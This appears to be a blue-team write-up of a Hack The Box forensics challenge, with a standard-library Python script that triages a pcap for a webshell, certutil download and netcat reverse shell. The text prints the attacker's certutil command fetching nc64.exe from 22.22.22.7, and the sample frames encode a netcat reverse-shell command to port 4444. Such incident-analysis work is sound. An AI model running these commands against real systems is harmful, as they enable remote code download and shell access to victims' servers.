HTB: Intro to Blue Team: Chase

Michael Koczwara
3 min read · Sep 27, 2021

Description

One of our web servers triggered an AV alert, but none of the sysadmins say they were logged onto it. We’ve taken a network capture before shutting the server down to make a clone of the disk. Can you take a look at the PCAP and see if anything is up?

Attack Analysis

In the capture, 22.22.22.7 is the attacker and 22.22.22.5 is the web server.

Filtering for HTTP traffic in Wireshark (display filter http) makes the exchange easier to follow.

HTTP Traffic

The first HTTP GET requests to, and responses from, the web server 22.22.22.5.

The attacker first uploaded a webshell; the requests to it carry the parameter authKey=admin.

Through the webshell the attacker ran a command that used certutil, a signed built-in Windows binary, to download netcat from the attacker's own host:

certutil -urlcache -split -f http://22.22.22.7/nc64.exe

Next, netcat runs on the web server and connects back to the attacker's machine on port 4444, i.e. a reverse shell.

Over that reverse shell the attacker ran whoami and ipconfig on the web server.
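The same chain can be pulled out of a capture without clicking through Wireshark. The script below is an added example, not part of the original write-up and not the challenge PCAP: it parses a classic pcap with the standard library only, then flags the indicators described above (webshell requests carrying authKey=admin, a certutil -urlcache download, the web server fetching a file from the attacker, a connection the web server initiates to a non-web port, and the commands sent over it). It generalizes the page's port 4444 to any outbound connection the web server opens to a port other than 80/443. The webshell path /shell.jsp, the command parameter name cmd, the certutil User-Agent string, the ephemeral ports and the sample frames are all assumptions; the traffic is constructed in memory so the script runs offline.

```python
"""Triage a pcap for the chain described above: webshell requests carrying
authKey=admin, a certutil download, and a reverse shell from the web server.
Standard library only; the sample capture is constructed in memory below,
it is not the challenge PCAP."""
import struct
from urllib.parse import parse_qs, urlsplit

ATTACKER, WEBSERVER = "22.22.22.7", "22.22.22.5"   # hosts named in the write-up
WEBSHELL_PATH = "/shell.jsp"                        # assumption: the write-up does not name it
SYN, ACK = 0x02, 0x10

def ip2bytes(a):
    return bytes(int(x) for x in a.split("."))

def bytes2ip(b):
    return ".".join(str(x) for x in b)

def tcp_frame(src, dst, sport, dport, payload=b"", flags=0x18):
    """Ethernet + IPv4 + TCP frame with zeroed checksums (the parser ignores them)."""
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 0, 0, 5 << 4, flags, 8192, 0, 0) + payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 0, 0, 64, 6, 0,
                     ip2bytes(src), ip2bytes(dst)) + tcp
    return b"\x00" * 12 + b"\x08\x00" + ip

def build_pcap(frames):
    """Classic pcap: 24-byte global header (LINKTYPE_ETHERNET) + 16-byte record headers."""
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)
    for i, f in enumerate(frames):
        out += struct.pack("<IIII", 1632700000 + i, 0, len(f), len(f)) + f
    return out

def iter_tcp(pcap):
    """Yield (src, dst, sport, dport, flags, payload) for every TCP segment."""
    end = "<" if struct.unpack("<I", pcap[:4])[0] == 0xA1B2C3D4 else ">"
    off = 24
    while off + 16 <= len(pcap):
        incl = struct.unpack(end + "IIII", pcap[off:off + 16])[2]
        frame, off = pcap[off + 16:off + 16 + incl], off + 16 + incl
        if frame[12:14] != b"\x08\x00":            # not IPv4
            continue
        ip = frame[14:14 + struct.unpack("!H", frame[16:18])[0]]
        if ip[9] != 6:                               # not TCP
            continue
        tcp = ip[(ip[0] & 0x0F) * 4:]
        sport, dport = struct.unpack("!HH", tcp[:4])
        yield (bytes2ip(ip[12:16]), bytes2ip(ip[16:20]), sport, dport,
               tcp[13], tcp[(tcp[12] >> 4) * 4:])

def parse_http_request(payload):
    """Return (method, target, headers, body), or None if the segment is not a request."""
    text = payload.decode("latin-1")
    if not text.startswith(("GET ", "POST ")):
        return None
    head, _, body = text.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target = lines[0].split(" ")[:2]
    headers = {k.lower(): v for k, v in (l.split(": ", 1) for l in lines[1:] if ": " in l)}
    return method, target, headers, body

def triage(pcap):
    """Walk the capture once and return (indicator, detail) findings in capture order."""
    findings, shells = [], set()          # shells: (attacker_ip, port) of reverse shells
    for src, dst, sport, dport, flags, payload in iter_tcp(pcap):
        if flags & SYN and not flags & ACK:
            # A web server initiating a connection to a non-web port is the reverse shell.
            if src == WEBSERVER and dport not in (80, 443):
                findings.append(("reverse_shell", f"{src}:{sport} -> {dst}:{dport}"))
                shells.add((dst, dport))
            continue
        req = parse_http_request(payload)
        if req and dst == WEBSERVER:
            _, target, _, body = req
            params = parse_qs(urlsplit(target).query)
            params.update(parse_qs(body))
            if params.get("authKey") == ["admin"]:        # webshell auth seen in the capture
                cmd = params.get("cmd", [""])[0]           # assumption: command parameter name
                findings.append(("webshell", f"{src} {urlsplit(target).path} {cmd!r}"))
                if cmd.startswith("certutil") and "-urlcache" in cmd:
                    findings.append(("lolbin_download", cmd.split()[-1]))
        elif req and src == WEBSERVER:
            # The server itself fetching a file: certutil pulling nc64.exe from the attacker.
            _, target, headers, _ = req
            findings.append(("outbound_fetch",
                             f"http://{dst}{target} ua={headers.get('user-agent', '?')}"))
        elif (src, sport) in shells and payload.strip():
            findings.append(("shell_command", payload.decode("latin-1").strip()))
    return findings

def webshell_request(cmd_encoded):
    """Constructed webshell GET; the parameter layout is an assumption."""
    return (f"GET {WEBSHELL_PATH}?authKey=admin&cmd={cmd_encoded} HTTP/1.1\r\n"
            f"Host: {WEBSERVER}\r\n\r\n").encode()

# Constructed sample traffic reproducing the chain from the write-up (not the real capture).
SAMPLE_FRAMES = [
    tcp_frame(ATTACKER, WEBSERVER, 50001, 80,
              webshell_request("certutil+-urlcache+-split+-f+http%3A%2F%2F22.22.22.7%2Fnc64.exe")),
    tcp_frame(WEBSERVER, ATTACKER, 80, 50001, b"HTTP/1.1 200 OK\r\nContent-Length: 0\r\n\r\n"),
    tcp_frame(WEBSERVER, ATTACKER, 50002, 80,          # certutil's User-Agent is an assumption
              b"GET /nc64.exe HTTP/1.1\r\nHost: 22.22.22.7\r\nUser-Agent: Microsoft-CryptoAPI/10.0\r\n\r\n"),
    tcp_frame(ATTACKER, WEBSERVER, 50003, 80, webshell_request("nc64.exe+22.22.22.7+4444+-e+cmd.exe")),
    tcp_frame(WEBSERVER, ATTACKER, 50004, 4444, flags=SYN),          # reverse shell connects back
    tcp_frame(ATTACKER, WEBSERVER, 4444, 50004, b"whoami\r\n"),
    tcp_frame(ATTACKER, WEBSERVER, 4444, 50004, b"ipconfig\r\n"),
]

if __name__ == "__main__":
    for indicator, detail in triage(build_pcap(SAMPLE_FRAMES)):
        print(f"{indicator:16} {detail}")
```

To run it against a real capture, replace build_pcap(SAMPLE_FRAMES) with the bytes of the .pcap file; the parser handles only the classic libpcap format with Ethernet framing, not pcapng, and TCP segments are inspected one at a time rather than reassembled, so a command split across segments would be missed.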
